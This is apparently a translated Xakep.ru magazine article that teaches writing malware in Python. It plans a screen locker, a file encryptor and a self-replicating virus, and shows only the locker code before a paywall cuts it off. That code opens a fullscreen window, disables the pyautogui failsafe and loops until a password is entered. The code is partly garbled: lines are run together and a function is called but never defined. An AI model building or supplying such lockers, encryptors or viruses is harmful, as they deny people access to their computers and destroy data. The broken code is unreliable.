The content of the article
Why would someone come up with the idea of writing malware in Python? We will do this in order to study the general principles of malware engineering, and at the same time you will practice using this language and you will be able to apply this knowledge for other purposes. In addition, Python malware still comes across in the wild, and not all antiviruses pay attention to it.
Most often, Python is used to create backdoors in software to load and execute any code on an infected machine. So, in 2017, Dr.Web employees discovered Python.BackDoor.33, and on May 8, 2019 was spotted Mac.BackDoor.Siggen.20. Another trojan – RAT Python stole user data from infected devices and used Telegram as a data transmission channel.
We will create three demo programs: a locker that will block access to the computer until the user enters the correct password, an encryptor that will bypass directories and encrypt all the files contained in them, and a virus that will spread its code, infecting other programs in Python.
The topic of remote administration of infected machines has remained beyond the scope of this article, however you can get the basis for the code with all the explanations in the article “Reverse shell in Python”.
Despite the fact that our creations do not claim to be at any high technical level, they can be dangerous under certain conditions. Therefore, I warn you that for the violation of the work of other people's computers and the destruction of information, severe penalties may follow. Let's immediately agree: to run everything that we describe here, you will only be on your machine, and even then carefully – so as not to accidentally encrypt your entire drive.
All information is provided for informational purposes only. Neither the author nor the editors are responsible for any possible harm caused by the materials in this article.
So, first of all, of course, we need Python itself, and the third version. I will not describe in detail how to install it, and immediately send you to download the free book “Python Bite” (Pdf) In it, you will find the answer to this and many other questions related to Python.
Additionally, install several modules that we will use:
pip install pyAesCryptpip install pyautoguipip install tkinter
This is the end of the preparatory phase, you can start writing code.
The idea is to create a window in full screen and prevent the user from closing it.
import pyautoguifrom tkinter import Tk, Entry, Labelfrom pyautogu соi import click, moveTofrom time import sleep
Now let's take up the main part of the program.
# Создаем окноroot = Tk()# Вырубаем защиту левого верхнего угла экранаpyautogui.FAILSAFE = False# Получаем ширину и высоту окнаwidth = root.winfo_screenwidth()height = root.winfo_screenheight()# Задаем заголовок окнаroot.title('From "Xakep" with love')# Открываем окно на весь экранroot.attributes("-fullscreen", True)# Создаем поле для ввода, задаем его размеры и расположениеentry = Entry(root, font=1)entry.place(width=150, height=50, x=width/2-75, y=height/2-25)# Создаем текстовые подписи и задаем их расположениеlabel0 = Label(root, text="╚(•⌂•)╝ Locker by Xakep (╯°□°）╯︵ ┻━┻", font=1)label0.grid(row=0, column=0)label1 = Label(root, text="Пиши пароль и жми Ctrl + C", font='Arial 20')label1.place(x=width/2-75-130, y=height/2-25-100)# Включаем постоянное обновление окна и делаем паузуroot.update()sleep(0.2)# Кликаем в центр окнаclick(width/2, height/2)# обнуляем ключk = False# Теперь непрерывно проверяем, не введен ли верный ключ# Если введен, вызываем функцию хулиганстваwhile not k: on_closing()
pyautogui.FAILSAFE = False – protection that is activated when the cursor moves to the upper left corner of the screen. When it is activated, the program closes. We do not need this, so we cut this function.
In order for our locker to work on any monitor with any resolution, we read the width and height of the screen and, using a simple formula, calculate where the cursor will go, click and so on. In our case, the cursor falls into the center of the screen, that is, we divide the width and height by two. Pause (
sleep) add so that the user can enter the code to cancel.
Now we have not blocked text input, but you can do it, and then the user will not get rid of us. To do this, write some more code. I do not advise doing this right away. First, let's configure the program so that it turns off when you enter the password. But the code to lock the keyboard and mouse looks like this:
Continuation is available only to participants
Materials from the latest issues become available separately only two months after publication. To continue reading, you must become a member of the Xakep.ru community.
Join the Xakep.ru Community!
Membership in the community during the specified period will open you access to ALL Hacker materials, increase your personal cumulative discount and allow you to accumulate a professional Xakep Score!
I am already a member of Xakep.ru